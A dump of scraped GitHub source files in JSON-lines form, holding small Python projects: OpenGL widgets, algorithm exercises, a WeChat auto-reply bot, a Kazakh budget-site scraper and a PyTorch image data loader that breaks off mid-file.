input('Lançar moeda? [S/N]').strip().upper()\n while esc not in 'SN':\n print('Não entendi')\n if esc == 'S':\n a = randint(0, 1)\n print(f'O resultado é {resultados[a]}')\n conts[a] += 1\n else:\n break\nprint(f'''Resultado:\nCaras: {conts[0]}\nCoroas: {conts[1]}''')\n# lançamento de cara ou coroa\n","repo_name":"atico0/python","sub_path":"aleatorios/teste5.py","file_name":"teste5.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28168009822","text":"from io import StringIO\n\nclass Flow:\n VTYPE = 'CAR'\n FLOWS_DIR = '/home/madis/SUMO/tmp/'\n def __init__(self, _id, route, t, n_cars):\n self.fid = _id\n self.route_name = route\n self.t = t\n self.n_cars = n_cars\n self.comment = None\n\n def to_xml(self):\n return f''\n\n def flows_to_xml(flows, buf=None):\n if buf is None:\n buf = StringIO()\n buf.write('\\n')\n # route file should be sorted by depart time\n for flow in sorted(flows, key=lambda f: f.t):\n if flow.n_cars == 0:\n continue\n buf.write('\\t'+flow.to_xml()+'\\n')\n if flow.comment is not None:\n buf.write('\\t\\n')\n buf.write('\\n')\n buf.flush()\n return buf\n\nif __name__ == '__main__':\n f1 = Flow('test1', 'f1', 10, 100)\n f2 = Flow('test2', 'f2', 5, 100)\n\n xml = Flow.flows_to_xml([f1, f2]).getvalue()\n print(xml)\n","repo_name":"faerics/masters-thesis","sub_path":"python_src/simulation/flow.py","file_name":"flow.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"43179815745","text":"import pyglet\nfrom pyglet import gl\nimport numpy as np\n\nfrom luminate import utility\nfrom luminate import datasource as ds\n\n\nclass AbstractWidget:\n\n _numPoints = 500\n\n def __init__(self, window, x, y, width, height):\n self._window = window\n self.x = x\n self.y = y\n self.width = width\n self.height = height\n\n def draw(self):\n\n gl.glTranslatef(self.x, self.y, 0)\n\n gl.glPushMatrix()\n self._draw_impl()\n gl.glPopMatrix()\n\n def _draw_impl(self):\n pass\n\n def update(self, dt):\n pass\n\n\nnum_textures = 0\n\n\nclass TextureWidget(AbstractWidget):\n\n def __init__(self, window, x, y, width, height, alpha=1.0, data_source=None):\n super().__init__(window, x, y, width, height)\n\n self._alpha = alpha\n\n if data_source is None:\n tex_data_2d = np.zeros((width, height, 3))\n mid_grey = np.array((0.5, 0.5, 0.5))\n tex_data_2d[...] 
= mid_grey\n data_source = ds.ConstantDataSource(tex_data_2d)\n\n self.data_source = data_source\n\n global num_textures\n self._tex_id = num_textures\n num_textures += 1\n self._tex_gl_handle = self._create_texture(self.data_source.get_data(), self._tex_id)\n\n def update(self, dt):\n self.data_source.update(dt)\n if self.data_source.has_new_data:\n self._tex_gl_handle = self._create_texture(self.data_source.get_data(), self._tex_id)\n\n def _create_texture(self, tex_array_2d, tex_id, shape=None):\n\n if tex_array_2d.dtype == np.dtype('uint8'):\n tex_array_2d = tex_array_2d.astype(float)\n tex_array_2d = tex_array_2d/256\n\n if shape is None:\n shape = tex_array_2d.shape\n\n height, width, depth = shape\n\n if depth == 1:\n gl_format = gl.GL_LUMINANCE\n elif depth == 4:\n gl_format = gl.RGBA\n else:\n gl_format = gl.GL_RGB\n\n tex_array_1d = np.ravel(tex_array_2d)\n if (width*height*depth != len(tex_array_1d)):\n raise ValueError(\"Shape does not match data!\")\n tex = (gl.GLfloat * len(tex_array_1d))(*tex_array_1d)\n\n tex_handle = gl.GLuint(tex_id)\n\n gl.glBindTexture(gl.GL_TEXTURE_2D, tex_handle)\n gl.glPixelStorei(gl.GL_UNPACK_ALIGNMENT, 1)\n gl.glTexParameteri(gl.GL_TEXTURE_2D, gl.GL_TEXTURE_MAG_FILTER, gl.GL_NEAREST)\n gl.glTexParameteri(gl.GL_TEXTURE_2D, gl.GL_TEXTURE_MIN_FILTER, gl.GL_NEAREST)\n gl.glTexImage2D(gl.GL_TEXTURE_2D, 0, gl_format, width, height,\n 0, gl_format, gl.GL_FLOAT, tex)\n\n return tex_handle\n\n def _draw_texture(self, tex_handle, x, y, width, height, alpha=1.0):\n gl.glColor4f(1.0, 1.0, 1.0, alpha)\n gl.glBindTexture(gl.GL_TEXTURE_2D, tex_handle)\n gl.glBegin(gl.GL_QUADS)\n gl.glTexCoord2i(0, 0)\n gl.glVertex2i(x, y+height)\n gl.glTexCoord2i(0, 1)\n gl.glVertex2i(x, y)\n gl.glTexCoord2i(1, 1)\n gl.glVertex2i(x+width, y)\n gl.glTexCoord2i(1, 0)\n gl.glVertex2i(x+width, y+height)\n gl.glEnd()\n\n def _draw_impl(self):\n self._draw_texture(self._tex_gl_handle, 0, 0, self.width, self.height, alpha=self._alpha)\n\n\nclass NoiseWidget(AbstractWidget):\n\n def update(self, dt):\n points = utility.random_points(self._numPoints,\n self.width, self.height).tolist()\n self._points = np.ravel(points, order=\"F\").tolist()\n self._colours = utility.random_colours(self._numPoints)\n\n def _draw_impl(self):\n\n pyglet.graphics.draw(self._numPoints, gl.GL_POINTS,\n ('v2i/stream', self._points),\n ('c3B/stream', self._colours))\n\n\nclass LinePlotWidget(AbstractWidget):\n\n def __init__(self, window, x, y, width, height,\n line_col=(1.0, 1.0, 1.0), data_source=None):\n super().__init__(window, x, y, width, height)\n\n self._line_col = line_col\n\n if data_source is None:\n data_source = ds.ConstantDataSource(np.ones(10))\n\n border_points = (0, 0, 0, self.height, self.width, self.height, self.width, 0)\n self._border = pyglet.graphics.vertex_list(4, ('v2i', border_points))\n\n self._data_source = data_source\n self._update_data()\n\n def update(self, dt):\n self._data_source.update(dt)\n if self._data_source.has_new_data:\n self._update_data()\n\n def _update_data(self):\n data = self._data_source.get_data()\n normed_data = norm_data(data)\n self._update_vertex_list(normed_data)\n\n def _update_vertex_list(self, normed_data):\n count = normed_data.size\n y_points = (normed_data * self.height)\n x_points = np.linspace(0, self.width, count)\n points = np.stack((x_points, y_points))\n points = np.ravel(points, order=\"F\").tolist()\n self._vertex_list = pyglet.graphics.vertex_list(count, ('v2f', points))\n\n def _draw_impl(self):\n self._border.draw(gl.GL_LINE_LOOP)\n 
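# --- Editor's note (not part of the scraped file): why order="F" in
# _update_vertex_list above: raveling the stacked (2, n) array in Fortran
# (column-major) order interleaves the coordinates into the flat
# x0, y0, x1, y1, ... layout that pyglet's 'v2f' vertex format expects.
# Tiny self-contained check:
#   np.ravel(np.stack(([0., 1.], [5., 6.])), order="F").tolist()
#   -> [0.0, 5.0, 1.0, 6.0]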
self._vertex_list.draw(gl.GL_LINE_STRIP)\n\n\nclass HeatmapWidget(TextureWidget):\n\n def __init__(self, window, x, y, width, height,\n min_col=(0.0, 1.0, 0.0), max_col=(1.0, 0.0, 0.0),\n data_source=None):\n super().__init__(window, x, y, width, height)\n\n self._minCol = np.array(min_col)\n self._maxCol = np.array(max_col)\n\n if data_source is None:\n data_source = ds.ConstantDataSource(np.ones((2, 2)))\n\n self.data_source = data_source\n\n data = data_source.get_data()\n self.data_width, self.data_height = data.shape\n self._update_texture(data)\n\n def _update_texture(self, data):\n self._data = data\n\n shape = data.shape\n normed_data = norm_data(data)\n\n dataVector = np.ravel(normed_data)\n a = np.outer(self._minCol, (1 - dataVector))\n b = np.outer(self._maxCol, dataVector)\n tex_data_2d = np.ravel(a+b, order=\"F\").reshape(shape[0], shape[1], 3)\n self._tex_gl_handle = self._create_texture(tex_data_2d)\n\n def update(self, dt):\n self.data_source.update(dt)\n if self.data_source.has_new_data:\n data = self.data_source.get_data()\n self._update_texture(data)\n\n\ndef norm_data(data):\n min_point = np.amin(data)\n max_point = np.amax(data)\n\n # If every data point is the same, normalise to 0.5\n if max_point == min_point:\n min_point = 0\n max_point *= 2\n\n normed_data = (data - min_point) / (max_point - min_point)\n return normed_data\n\n\ndef test():\n pass\n\n\nif __name__ == '__main__':\n import timeit\n print(1/(timeit.timeit(\"test()\", setup=\"from __main__ import test\", number=10)/10))\n","repo_name":"michaeljamesorr/luminate","sub_path":"luminate/widget.py","file_name":"widget.py","file_ext":"py","file_size_in_byte":6794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18203954002","text":"class Solution:\n def maxProfit(self, k: int, prices: List[int]) -> int:\n if k >= len(prices) // 2:\n sell = 0\n hold = -math.inf\n\n for price in prices:\n sell = max(sell, hold + price)\n hold = max(hold, sell - price)\n\n return sell\n\n sell = [0] * (k + 1)\n hold = [-math.inf] * (k + 1)\n\n for price in prices:\n for i in range(k, 0, -1):\n sell[i] = max(sell[i], hold[i] + price)\n hold[i] = max(hold[i], sell[i - 1] - price)\n\n return sell[k]\n","repo_name":"walkccc/LeetCode","sub_path":"solutions/0188. 
Best Time to Buy and Sell Stock IV/0188.py","file_name":"0188.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":756,"dataset":"github-code","pt":"21"} +{"seq_id":"70115927412","text":"class Person(object):\n\n def __init__(self, name, birth_year, gender, father=None, mother=None):\n self.__siblings_observers = []\n self.successors = []\n self.name = name\n self.birth_year = birth_year\n self.gender = gender\n self.father = father\n self.mother = mother\n if self.mother:\n self.__siblings_observers.append(self.mother.children)\n self.mother.successors.append(self)\n if self.father:\n self.__siblings_observers.append(self.father.children)\n self.father.successors.append(self)\n\n def get_brothers(self):\n return self.__get_my_siblings(\"M\")\n\n def get_sisters(self):\n return self.__get_my_siblings(\"F\")\n\n def __get_my_siblings(self, gender):\n siblings = set()\n for observer in self.__siblings_observers:\n siblings.update(observer(gender))\n siblings.discard(self)\n return list(siblings)\n\n def children(self, gender=\"both\"):\n if gender == \"both\":\n return self.successors\n else:\n return [child for child in self.successors if child.gender == gender]\n\n def is_direct_successor(self, other):\n return other in self.successors or self in other.successors\n","repo_name":"DesislavaPanchovaPetrova/python-retrospective","sub_path":"task3/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15932254389","text":"import sys\nfrom collections import defaultdict\nfrom functools import reduce\nimport heapq\n\ninput_file = sys.argv[1] if len(sys.argv) > 1 else 'input.txt'\n\ndepths = defaultdict(int)\nwith open(input_file, 'r') as file:\n for i, line in enumerate(file):\n line_values = [int(x) for x in line.split()[0]]\n for j, value in enumerate(line_values):\n depths[(i,j)] = value\n\ndef is_low_point(x, y):\n adjacents = [(x+1, y), (x-1, y), (x, y+1), (x, y-1)]\n\n for adjacent in adjacents:\n if adjacent in depths and depths[adjacent] <= depths[(x, y)]:\n return False\n\n return True\n\ndef basin_size(x, y):\n size = 0\n keys = [(x,y)]\n\n seen = set()\n\n while len(keys) > 0:\n key = keys.pop()\n\n if key not in depths or key in seen:\n continue\n\n seen.add(key)\n size += 1\n\n adjacent_keys = [\n (key[0]+1, key[1]),\n (key[0]-1, key[1]),\n (key[0], key[1]+1),\n (key[0], key[1]-1)\n ]\n\n for adjacent in adjacent_keys:\n if depths[adjacent] != 9 and depths[adjacent] > depths[key]:\n keys.append(adjacent)\n\n return size\n\ndef answer1():\n answers = []\n for key in depths.keys():\n if is_low_point(*key):\n answers.append(depths[key]+1)\n\n return sum(answers)\n\nprint(answer1())\n\ndef answer2():\n answers = []\n heapq.heapify(answers)\n\n for key in depths.keys():\n if is_low_point(*key):\n heapq.heappush(answers, basin_size(*key))\n\n return reduce(lambda x, y: x*y, list(heapq.nlargest(3, answers)))\n\nprint(answer2())","repo_name":"Mlordx/aoc-21","sub_path":"day09/day9.py","file_name":"day9.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10073264834","text":"# https://leetcode.com/explore/featured/card/january-leetcoding-challenge-2021/579/week-1-january-1st-january-7th/3594/\n\nclass Solution:\n def findKthPositive(self, arr, k: int) -> int:\n counter = 0\n for i, n in enumerate(arr):\n 
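# --- Editor's note (not part of the scraped record): invariant for the loop
# below: after handling arr[i], `counter` is the number of missing positive
# integers strictly below arr[i] (arr is strictly increasing). Worked trace
# for arr = [2, 3, 4, 7, 11], k = 5: the gaps contribute 1, 0, 0, 2, 3, so
# counter reaches 6 (>= 5) at n = 11 and the answer is 11 - (6 - 5) - 1 = 9.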
if i == 0:\n counter += n - 1\n else:\n counter += n - arr[i-1] - 1\n \n if counter >= k:\n return n - (counter - k) - 1\n \n if counter < k:\n return arr[-1] + (k - counter)\n\n\n\nif __name__ == \"__main__\":\n arr = [1,2,3,4]\n k = 2\n s = Solution()\n print(s.findKthPositive(arr, k))","repo_name":"mmdaz/my_solved_algorithm_problems","sub_path":"january-leetcoding-challenge-2021/kth-missing-number.py","file_name":"kth-missing-number.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"42416912916","text":"\"\"\"\nhowSum(targetSum, numbers) - takes a list of nums and a target sum as input and returns the possible set of numbers that result in target sum.\n\"\"\"\n\n\ndef howSum(target: int, nums: list) -> list:\n '''\n returns the set of numbers in nums list that can produce the target sum. \n\n BRUTE FORCE METHOD \n Complexity: n = len(nums), m = target \n O(n^m * m) time and \n O(m+m) space\n\n Parameters\n ----------\n target : int\n required target sum\n\n nums : list\n provided list of non-negative numbers\n\n Returns\n -------\n list\n list of numbers that form target sum\n\n '''\n\n if target == 0:\n return []\n\n if target < min(nums):\n return None\n ans = []\n for num in nums:\n r = howSum(target-num, nums)\n if r != None:\n r.append(num)\n return r\n\n return None\n\n\ndef howSum_memoized(target: int, nums: list, memo={}) -> list:\n '''\n returns the set of numbers in nums list that can produce the target sum. \n\n MEMOIZATION METHOD \n Complexity: n = len(nums), m = target \n O(n*m^2) time and \n O(m^2) space\n\n Parameters\n ----------\n target : int\n required target sum\n\n nums : list\n provided list of non-negative numbers\n\n\n Returns\n -------\n list\n list of numbers that form target sum\n\n '''\n if target in memo:\n return memo[target]\n\n if target == 0:\n return []\n\n if target < 0:\n return None\n\n for num in nums:\n r = howSum_memoized(target-num, nums, memo)\n if r != None:\n r.append(num)\n memo[target] = r\n return r\n\n memo[target] = None\n return None\n\ndef howSum_tab(target:int, nums:list[int]) -> list :\n '''\n returns the set of numbers in nums list that can produce the target sum. 
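# --- Editor's note (not part of the scraped record): howSum_memoized above
# uses a mutable default argument (memo={}), so the cache persists across
# calls and can leak answers between calls with different `nums` inputs.
# A hedged sketch of the usual safe pattern:
def how_sum_safe(target, nums, memo=None):
    if memo is None:
        memo = {}                      # fresh cache per top-level call
    if target in memo:
        return memo[target]
    if target == 0:
        return []
    if target < 0:
        return None
    for num in nums:
        rest = how_sum_safe(target - num, nums, memo)
        if rest is not None:
            memo[target] = rest + [num]
            return memo[target]
    memo[target] = None
    return None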
\n\n MEMOIZATION METHOD \n Complexity: n = len(nums), m = target \n O(n*m^2) time and \n O(m^2) space\n\n Parameters\n ----------\n target : int\n required target sum\n\n nums : list\n provided list of non-negative numbers\n\n\n Returns\n -------\n list\n list of numbers that form target sum\n\n '''\n\n table = [None for _ in range(target+1)]\n table[0] = []\n\n for i in range(target+1):\n if table[i] == None: continue \n for num in nums:\n if i+num <= target: \n table[i+num] = table[i].copy()\n table[i+num].append(num)\n\n return table[target]\n\n\nprint(howSum(7, [2, 4])) # None\nprint(howSum(7, [5, 3, 4, 7])) # [4,3]\nprint(howSum_tab(8, [2, 3, 5])) # [2, 2, 2, 2]\nprint(howSum_tab(300, [7, 14])) # None\nprint(howSum_tab(300, [7, 20, 14])) # [20, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7]","repo_name":"AlokPratapSingh22/Algos","sub_path":"DynamicProgramming/DP tutorial ques/howSum.py","file_name":"howSum.py","file_ext":"py","file_size_in_byte":2895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71331815734","text":"#%% 找微信开了没,微信的位置\r\n\r\ndef wechat_init():\r\n\r\n pos1 = 'pos1.png'\r\n pos2 = 'pos2.png'\r\n send = 'send.png'\r\n standby = 'block2.png'\r\n while True:\r\n location1 = pyautogui.locateCenterOnScreen(pos1, confidence=0.9)\r\n # location2 = pyautogui.locateCenterOnScreen(pos2, confidence=0.9)\r\n location3 = pyautogui.locateCenterOnScreen(send, confidence=0.9)\r\n location4 = pyautogui.locateCenterOnScreen(standby, confidence=0.9)\r\n if location1 and location3 and location4:\r\n break\r\n else:\r\n print(\"未打开微信,1秒后重试\")\r\n time.sleep(1)\r\n print(location1)\r\n return location1, location3, location4\r\n\r\n#%% 找有没有新消息\r\n\r\ndef mainWork():\r\n red = 'red.png'\r\n while True:\r\n location = pyautogui.locateCenterOnScreen(red, confidence=0.9)\r\n if location:\r\n break\r\n else:\r\n print(\"没有新消息,1秒后重试\")\r\n time.sleep(1)\r\n return location\r\n\r\n\r\ndef find_txt():\r\n chat = 'pos3.png'\r\n while True:\r\n locations = pyautogui.locateAllOnScreen(chat) # , confidence=0.9\r\n if locations:\r\n break\r\n else:\r\n print(\"没有消息,1秒后重试\")\r\n time.sleep(1)\r\n time.sleep(0.2)\r\n txt = list(locations)\r\n if txt != []:\r\n pos = sorted(txt, key=lambda x:x[1], reverse=True)[0]\r\n print(pos)\r\n pyautogui.doubleClick([pos[0]+25, pos[1], pos[2], pos[3]])\r\n time.sleep(0.5)\r\n pyautogui.hotkey('ctrl', 'c')\r\n time.sleep(0.2)\r\n txt = pyperclip.paste()\r\n # print(str(txt))\r\n return str(txt)\r\n\r\n\r\ndef send_response(location1, location3, response):\r\n pyautogui.click([location1[0]+50, location1[1]+50])\r\n pyperclip.copy(response)\r\n pyautogui.hotkey('ctrl', 'v')\r\n time.sleep(0.5)\r\n pyautogui.click(location3)\r\n\r\n\r\ndef send_emoji(location1):\r\n pyautogui.click(location1)\r\n time.sleep(0.2)\r\n like = 'like.png'\r\n location2 = pyautogui.locateCenterOnScreen(like, confidence=0.9)\r\n pyautogui.click(location2)\r\n time.sleep(0.2)\r\n emoji = 'emoji.png'\r\n location3 = pyautogui.locateCenterOnScreen(emoji, confidence=0.9)\r\n pyautogui.click(location3)\r\n time.sleep(0.2)\r\n\r\n\r\nif __name__ == '__main__':\r\n import pyautogui\r\n import time\r\n import pyperclip\r\n import CHAT\r\n\r\n location1, location3, location4 = wechat_init()\r\n access_token = CHAT.CHAT_init()\r\n pyautogui.click(location4)\r\n time.sleep(0.1)\r\n while True:\r\n red = mainWork()\r\n time.sleep(0.5)\r\n pyautogui.click(red)\r\n 
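# --- Editor's note (not part of the scraped record): the polling loops in
# wechat_init/mainWork/find_txt all repeat the same locate-or-sleep pattern.
# A hedged, hypothetical helper that bounds the wait instead of looping
# forever. Assumes a pyautogui version where a miss returns None (newer
# releases may raise ImageNotFoundException; confidence= needs opencv-python):
def wait_for_image(image, timeout=30.0, interval=1.0, confidence=0.9):
    deadline = time.time() + timeout
    while time.time() < deadline:
        pos = pyautogui.locateCenterOnScreen(image, confidence=confidence)
        if pos:
            return pos
        time.sleep(interval)
    return None  # caller decides how to handle the timeout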
+{"seq_id":"28156687783","text":"from bs4 import BeautifulSoup\nimport requests\nimport os\nos.environ[\"PARSE_API_ROOT\"] = \"https://astanasu.herokuapp.com/parse\"\nfrom parse_rest.datatypes import Function, Object, GeoPoint\nfrom parse_rest.connection import register\nfrom parse_rest.query import QueryResourceDoesNotExist\nfrom parse_rest.connection import ParseBatcher\nfrom parse_rest.core import ResourceRequestBadRequest, ParseError\n\nAPPLICATION_ID = 'AberdeenGirl'\nREST_API_KEY = 'AberdeenGirlClient'\nMASTER_KEY = 'AberdeenMasterKey'\n\nregister(APPLICATION_ID, REST_API_KEY, master_key=MASTER_KEY)\n\n\nclass Programme(Object):\n pass\nclass SubProgramm(Object):\n\tpass\nbase_link = \"https://budget.egov.kz\"\ndef parseBasic(number): \n\theaders = {'Accept-Language': 'ru-RU'}\n\tresult = requests.get(\"https://budget.egov.kz/budgetprogram/budgetprogram?page=\"+number+\"&budgetState=APPROVED\",headers = headers, verify=False)\n\treturn result.content\ndef parseDetailed(link):\n\theaders = {'Accept-Language': 'ru-RU'}\n\tresult = requests.get(link,headers = headers, verify=False)\n\treturn result.content\nsubProgrammes = []\n\nfor page in range(1,135):\n\thtml = parseBasic(str(page))\n\tsoup = BeautifulSoup(html)\n\tsamples = soup.find_all(\"a\", \"bpname\")\n\tfor sample in samples:\n\t\tsubProgrammes = []\n\t\tlink = base_link+sample['href']+\"&lang=ru\"\n\t\ttext = sample.getText().rstrip()\n\t\thtml_detailed = parseDetailed(link)\n\t\tsoup_detailed = BeautifulSoup(html_detailed)\n\t\theaders = soup_detailed.find_all(\"h1\")\n\t\theader = headers[0]\n\t\ttables = soup_detailed.find_all(\"td\")\n\t\toldlen = len(tables)\n\t\tfor longtables in range(0,len(tables)*5):\n\t\t\ttables.append(tables[longtables])\n\t\tprint(tables[21].getText().rstrip())\n\t\tname = header.getText() # Programme name\n\t\tadministrator_budget_program = tables[1].getText() # Budget programme administrator\n\t\tbudget_programm = tables[3].getText()\n\t\thead_budget_programm = tables[5].getText()\n\t\tprint(head_budget_programm)\n\t\tnorm_prav_osnova = tables[7].getText()\n\t\topisanie_obosnovanie = tables[9].getText()\n\t\tvid_gos_upr = tables[11].getText()\n\t\tvid_gos_sod = tables[13].getText()\n\t\tvid_soc_real = tables[15].getText()\n\t\ttekushee_ili_razvitie = tables[17].getText()\n\t\tgoal = tables[19].getText()\n\t\tzadacha = tables[21].getText()\n\t\tyear = tables[23].getText()\n\t\thowmany = 0\n\t\tstart = 0\n\t\tmoney_type = 'тенге'\n\t\tbudget_2016 = 0\n\t\tbudget_2017 = 0\n\t\tbudget_2018 = 0\n\t\tbudget_2019 = 0\n\t\tbudget_2020 = 0\n\t\tonce = True\n\t\toverallindex = 0\n\t\tfor q in range(0, oldlen):\n\t\t\tif tables[q].getText().rstrip()==\"Расходы по бюджетной программе, всего\":\n\t\t\t\tprint('start')\n\t\t\t\tstart = q\n\t\t\tif ((\"Итого расходы по бюджетной\" in tables[q].getText().rstrip()) and 
once):\n\t\t\t\tprint(tables[q].getText().rstrip())\n\t\t\t\tonce = False\n\t\t\t\toverallindex = q\n\t\t\t\thowmany = int((q - start)/7)\n\t\t\t\tprint(howmany)\n\t\tmoney_type = tables[overallindex+1].getText()\n\t\tbudget_2016 = tables[overallindex+2].getText()\n\t\tbudget_2017 = tables[overallindex+3].getText()\n\t\tbudget_2018 = tables[overallindex+4].getText()\n\t\tbudget_2019 = tables[overallindex+5].getText()\n\t\tbudget_2020 = tables[overallindex+6].getText()\n\t\tprogramm = Programme(name = name, administrator_budget_program = administrator_budget_program, budget_programm = budget_programm, norm_prav_osnova = norm_prav_osnova, opisanie_obosnovanie=opisanie_obosnovanie,vid_gos_upr=vid_gos_upr,vid_gos_sod=vid_gos_sod,vid_soc_real=vid_soc_real,tekushee_ili_razvitie=tekushee_ili_razvitie,goal=goal,zadacha=zadacha,year=year,money_type=money_type,budget_2016=budget_2016,budget_2017=budget_2017,budget_2018=budget_2018,budget_2019=budget_2019,budget_2020=budget_2020)\n\t\tprogramm.save()\t\n\t\tfor o in range(0,howmany):\n\t\t\tstart = o*7+start\n\t\t\tsp = SubProgramm(name = tables[start+1].getText(),money_type = tables[start+2].getText(),budget_2016 = tables[start+3].getText(),budget_2017 = tables[start+4].getText(),budget_2018 = tables[start+5].getText(),budget_2019 = tables[start+6].getText(),budget_2020 = tables[start+7].getText())\n\t\t\trelation = programm.relation('subProgrammes')\n\t\t\trelation.add([sp])\n\n\n\t\t\n\n\n\n\n\t\n\n","repo_name":"Flaminis/openBudget","sub_path":"egov.py","file_name":"egov.py","file_ext":"py","file_size_in_byte":4106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9770072413","text":"import os\nimport torch\nimport random\nimport signal\nimport numpy as np\nfrom collections import namedtuple\nfrom copper import index\nfrom copper import utils\n\n# for loading and transforming images; move this outside of DataProvider?\n# Could map across many procs via zeromq?\nfrom PIL import Image\nfrom torchvision import transforms\nfrom functools import partial\nfrom multiprocessing import Pool \n\n# Tell workers to ignore Ctrl-C; let the parent process handle it\ndef _init_pool_worker():\n signal.signal( signal.SIGINT, signal.SIG_IGN )\n\npool = Pool( processes = 4, initializer = _init_pool_worker ) \n\n\n# Extending Dataset allows us to work in concert with torch.utils.data.DataLoader,\n# which is convenient\nclass DataProvider( torch.utils.data.Dataset ):\n INVALID_CLASS_ID = -1\n\n def __init__( self, args = None ):\n super().__init__()\n \n self._args = args\n self._index = None\n# self._class_table = None\n# self._path_table = None\n self._num_items = 0\n self._load_function = self._default_load\n self._augment_function = self._default_augment\n self._sample_size = (3, 256, 256)\n self._crop_size = (3, 224, 224)\n self._batch_dim = (128, 3, 224, 224) # Assume ImageNet-type usage\n self._normalization = utils.NORMALIZE_IMAGENET\n\n print( \"DataProvider: sample_size:%s crop_size:%s\" % \n (str(self._sample_size), str(self._crop_size)) )\n \n\n def classname_from_id( class_id ):\n return self._class_table[ class_id ]\n \n \n @staticmethod\n def from_index( path ):\n #print( \"Loading index %s\" % path )\n provider = DataProvider()\n provider.index = index.Index.from_path( path )\n \n return provider\n\n # Assume samples are images; use PIL to load them\n # TODO: return object descriptions, if present\n def _default_load( self, sample, sample_size ):\n if not sample:\n raise IOError( 
\"_default_load: sample is null\" )\n \n try:\n class_path = self.index.path_table.classpath_from_id( sample.path_id )\n path = class_path + os.path.sep + sample.filename\n\n image = Image.open( path )\n\n if sample_size:\n bpp = sample_size[0]\n width = sample_size[1]\n height = sample_size[2]\n\n # If image is smaller than (width, height) resize before cropping\n image_width = image.width\n image_height = image.height\n\n scale_width = width / image_width\n scale_height = height / image_height\n scale = max(scale_width, scale_height)\n\n old_size = image_width, image_height\n new_size = (int)(scale * image_width), (int)(scale * image_height)\n\n #print( \"_default_load %d x %d -> %d x %d\" % ( image.width, image.height, new_size[0], new_size[1] ) )\n\n image = image.resize( new_size ) # don't use thumbnail; it won't size up, only down\n \n if image.mode != 'RGB':\n image = image.convert( 'RGB' )\n except (IOError, TypeError) as error:\n print( \"_default_load %s\" % (error) );\n print( sample )\n raise IOError from error\n return None\n\n return image;\n\n #\n # TODO: move augmentation functions into class methods or even a separate module\n #\n def _no_augment_center_crop( self, image, crop_size ):\n bpp = crop_size[ 0 ]\n width = crop_size[ 1 ]\n height = crop_size[ 2 ] \n\n if not image:\n raise IOError( \"_no_augment_center_crop: image is null\" )\n\n left = (int)((image.width - width) / 2) \n right = left + width\n top = (int)((image.height - height) / 2)\n bottom = top + height\n\n crop = image.crop( (left, top, right, bottom) ) \n\n print( \"_no_augment_center_crop %d x %d -> %d x %d\" % (image.width, image.height, crop.width, crop.height) )\n\n crop = transforms.ToTensor()( crop )\n\n if self._normalization:\n crop = transforms.Normalize(\n mean = self._normalization.mean, \n std = self._normalization.std )( crop )\n\n return crop\n\n # return the full image (for validation / inference; the 5-crops or 10-crops will be performed \n # in the main loop because DataLoader doesn't really support in-place expansion of the number of samples)\n def _no_augment_no_crop( self, image, crop_size ):\n bpp = crop_size[ 0 ]\n width = crop_size[ 1 ]\n height = crop_size[ 2 ] \n\n if not image:\n raise IOError( \"_no_augment_no_crop: image is null\" )\n\n img = image.resize( (width, height), resample = Image.BILINEAR )\n #print( \"_no_augment_no_crop %d x %d -> %d x %d\" % (image.width, image.height, img.width, img.height) )\n img = transforms.ToTensor()( img )\n\n if self._normalization:\n img = transforms.Normalize(\n mean = self._normalization.mean,\n std = self._normalization.std )( img )\n\n return img\n\n # Assume samples are images, and apply standard ImageNet-ish transformations\n # Should return a float tensor, not a CUDA tensor, becuase this will be run in another process\n # that can't use CUDA\n def _default_augment( self, image, crop_size ):\n bpp = crop_size[ 0 ]\n width = crop_size[ 1 ]\n height = crop_size[ 2 ]\n\n if not image:\n raise IOError( \"_default_augment: image is null\" )\n\n crop = transforms.RandomResizedCrop( size = width )( image ) # equivalent to scale(0.08 - 1.0), then crop\n crop = transforms.RandomHorizontalFlip()( crop )\n crop = transforms.ToTensor()( crop )\n\n if self._normalization:\n crop = transforms.Normalize(\n mean = self._normalization.mean,\n std = self._normalization.std )( crop )\n\n return crop\n\n # If a sample fails to load (e.g. 
malformed PNG or JPEG) we need to return\n # a dummy tensor of the proper dimensions.\n # Otherwise iterating over the DataProvider via a torch.utils.data.DataLoader will explode.\n def _null_sample( self, sample_size ):\n bpp = sample_size[0]\n width = sample_size[1]\n height = sample_size[2]\n tensor = torch.FloatTensor( bpp, width, height ).zero_()\n class_id = random.randint( 0, len(self.index.class_table) - 1 )\n\n #print( \"_null_sample( %d )\" % class_id )\n \n return tensor, class_id\n \n\n def _get_sample( self, sample ):\n # Load the training targets (one or more class_ids and optional bounding boxes)\n class_ids = []\n bounding_boxes = []\n for obj in sample.objects:\n class_ids.append( obj.class_id )\n bounding_boxes.append( obj.bounding_box )\n\n class_ids = torch.from_numpy(np.array(class_ids))\n bounding_boxes = torch.from_numpy(np.array(bounding_boxes))\n \n if len(class_ids) == 1:\n class_ids = class_ids.squeeze()\n bounding_boxes = bounding_boxes.squeeze()\n\n # Load and transform the image\n try:\n img = self._load_function( sample, self._sample_size )\n tensor = self._augment_function( img, self._crop_size )\n except IOError as error:\n # DataLoader pukes if we return None, so return an empty Sample\n print( \"__getitem__ %s : %s - returning zero tensor\" % (sample.path, error) )\n tensor, class_ids, bounding_boxes = self._null_sample( self._sample_size )\n\n# print( \"class_ids = 